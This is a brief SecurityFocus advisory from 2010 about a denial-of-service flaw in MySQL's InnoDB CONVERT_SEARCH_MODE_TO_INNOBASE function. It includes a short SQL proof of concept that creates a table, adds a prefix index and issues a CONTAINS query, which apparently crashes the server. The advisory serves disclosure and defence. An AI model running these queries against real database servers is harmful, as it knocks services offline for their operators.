MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability

Attackers can use standard database client software to exploit this issue.

The following proof of concept is available:

mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set

mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');


 

Privacy Statement
Copyright 2010, SecurityFocus